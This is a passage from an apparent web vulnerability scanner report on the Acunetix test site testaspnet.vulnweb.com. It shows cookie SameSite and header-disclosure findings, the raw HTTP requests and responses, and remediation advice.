          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

  5. Risk=, Confidence=中等的 (99)

    1. http://testaspnet.vulnweb.com (99)

      1. Cookie without SameSite Attribute (2)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          Cookie已被设置为无SameSite属性,这意味着Cookie可以作为“跨站点”请求的结果来发送。SameSite属性是一个用以测量跨站点请求伪造数量、包含跨站点脚本数量和定时攻击数量的高效计数器。

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          ASP.NET_SessionId
          Evidence
          Set-Cookie: ASP.NET_SessionId
          Solution

          Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          Cookie已被设置为无SameSite属性,这意味着Cookie可以作为“跨站点”请求的结果来发送。SameSite属性是一个用以测量跨站点请求伪造数量、包含跨站点脚本数量和定时攻击数量的高效计数器。

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
